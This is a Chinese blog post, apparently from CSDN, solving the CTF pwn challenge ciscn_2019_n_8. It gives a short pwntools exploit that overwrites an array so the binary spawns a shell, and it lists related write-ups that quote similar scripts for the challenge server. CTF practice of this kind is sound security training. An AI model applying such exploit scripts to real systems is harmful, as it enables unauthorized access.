ciscn_2019_n_8 wirte bss data

最新推荐文章于 2024-04-14 22:13:54 发布

原创最新推荐文章于 2024-04-14 22:13:54 发布 · 320 阅读

0 ·

CC 4.0 BY-SA版权

pwn 专栏收录该内容

38 篇文章

订阅专栏

本文通过使用Python的pwntools库，详细演示了如何针对CISCN_2019_N_8二进制程序进行漏洞分析与利用。通过构造payload并发送至目标进程，实现了对程序的远程控制。适用于对二进制漏洞分析与利用感兴趣的安全研究人员。

from pwn import *
p = process("./ciscn_2019_n_8")

p.recvuntil('name?\n')

payload = p32(0x11) * 14

p.sendline(payload)

p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

「已注销」

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

[buuctf]ciscn_2019_n_8

逆向萌新的博客

06-19

579

[buuctf]ciscn_2019_n_8

de1ctf_2019_weapon (IO_FILE)

BengDouLove的博客

05-27

1162

这道题的方法对于我来说有点陌生，堆操作之后利用IO_FILE的相关知识，记录一下，以后还会有更多对于 IO 的利用保护机制全开，所以常规方法肯定没办法分析程序：这是主程序 menu函数 create函数逻辑是输入申请大小，在输入index，然后就写入chunk 没有任何检查，比如申请过的index不能用之类的最简洁的申请函数 delete函数同样是简洁的释放函数，而且有 uaf 漏洞 rename函数改写chunk内容，写入的时候貌似没有溢出，但是 uaf 能用在这上面程序看似

参与评论您还未登录，请先登录后发表或查看评论

ciscn_2019_n_8

m0sway的博客

03-16

880

Buu PWN ciscn_2019_n_8 详解writeup

read_wirte_ram.rar_FPGA ram_FPGA双口RAM_fpga ram_ram_双口ram vhdl

09-21

在电子设计领域，FPGA（Field-Programmable Gate Array）是一种广泛应用的可编程逻辑器件，它可以被配置为实现各种不同的数字逻辑功能。本压缩包文件"read_write_ram.rar"聚焦于一个重要的主题：FPGA中的双口RAM...

read-wirte--binary.rar_文件分段

09-23

在IT行业中，尤其是在处理大数据和文件操作的场景下，如何高效地读取和写入大文件是一项关键的技术挑战。特别是当文件大小超过64MB甚至更大时，传统的单次读写操作可能会遇到性能瓶颈，例如内存限制、I/O效率低下等...

smbus和PCF8591_树莓派_IIC_I2C_smbus的write_byte，write_byte_data，read_byte，都在这里了

Bi9R!ver的博客

04-14

2627

关于smbus和PCF8591的一些笔记 by 57by \ 57by 57 其实这个事情，PPT上已经讲的很清楚了，但是还是有必要记一下，因为smbus这个玩意它没文档（或者说是我找不到文档）…… 首先，I2CI^2CI2C的通信原理什么的就不赘述了，前面的PPT都有，master和slaver，高电平和低电平的各种转换……至少有两个PPT都是讲这个的，也讲得很清楚。那我下面主要说说smbus里面的一些代码为什么要那么用吧，这些是PPT里没有讲得太清楚的，hmmm，至少我是这么觉得

我们在java中编写了一个filtflit函数。滤波器的输出与Matlab中的输出相同。_We wirte a filt

最新发布

09-12

Java语言作为一种跨平台、面向对象的编程语言，广泛应用于企业级开发、移动应用开发等领域。在处理数字信号或数据分析时，实现与Matlab中相似的功能是非常有用的，尤其是在需要将算法部署到生产环境或者Web应用中时...

[BUUCTF] ciscn_2019_n_8

Lucien_Carr的博客

04-14

615

这道题非常简单（甚至比ret2text简单...），只需要满足让系统调用system函数的条件，即将var[13]这个数组里全部填上17即可。checksec --file='filename' # filename为下载文件的自定义名称。观察选择条件，只需要满足var[13] = 17就可以。前面有scanf函数，可以直接向var数组输入。开了canary、NX和PIE，似乎防得很严实。主函数里就调用了system函数，运气很好。32位程序，放到IDA中继续分析。攻击成功，运行结果如下。

[BUUCTF-pwn]——ciscn_2019_n_8

Y_peak的博客

02-10

3060

[BUUCTF-pwn]——ciscn_2019_n_8 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_8 题目上去checksec一下,吓一跳保护基本全开了。在IDA中一看，开心了。如此简单　只需要v[13] ==17 就好。因为var是以字符串的形式输入的。所以exploit如下: exploit from pwn import * p = remote("node3.buuoj.cn",29772) p.sendline("aaaa"*13 +

【BUUCTF - PWN】ciscn_2019_n_8

古月浪子的博客

03-27

1246

checksec一下，好叭全开 IDA打开看看，var是int数组，如果var[13]=0x11的话就能get flag from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' sla=lambda x,y:io.sendlin...

buuctf——ciscn_2019_n_8

qq_41560595的博客

03-21

721

查看权限开了好多权限查看源代码分析观察，var数组是int类型，在内存中占了4个字节。输入一个字符串，令var[13]处的值是17，且这个值占4个字节，就能拿到shell。 var中每一个元素占4个字节，payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节，就要用p64打包。解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*

buuctf pwn ciscn_2019_n_8

zip471642048的博客

06-21

426

checksec 看一下基本信息把程序拖到ida32分析一波，可以看到读入字符串给了 var 然后后面的v4，v5没起作用，然后判断了var[13]是不是等于\x11,是就给一个shell 所以只要让我们输入的字符后13位等于...

Buuctf(pwn)ciscn_2019_n_8

半岛铁盒的博客

03-28

302

保护开的挺全; from pwn import* r=remote('node3.buuoj.cn',28155) payload = p32(17)*14 r.sendline(payload) r.interactive() 没利用漏洞,简单的输入满足条件就好了

BUUCTF-PWN-ciscn_2019_n_8

Henlenl的博客

05-18

311

文章目录查看文件信息IDA 分析exp 查看文件信息 checksec 一下,保护还开的挺满 canary(栈保护)，nx(堆栈不可执行)，PIE(地址随机化) IDA 分析其实我们应该nc 连一下的查看远程程序运行情况丢入 32位IDA分析一下很显然程序的意思就是让 var[13] == 17就能拿到shell了 exp from pwn import * r = remote('node3.buuoj.cn',27168) #r = process('./ciscn_2019_n_8')

buuctf之ciscn_2019_n_8

weixin_54452942的博客

04-12

857

两个方法解题

OPPO_S9系列美化工具深度解析与应用

- RKW（Rom Kernel Wirte）美化工具：RKW美化工具可能允许用户更改系统的内核设置，以实现更加深入的定制化和美化。 - 图片裁剪工具：这个工具可能提供给用户进行图片编辑的功能，包括但不限于图片裁剪，调整图片...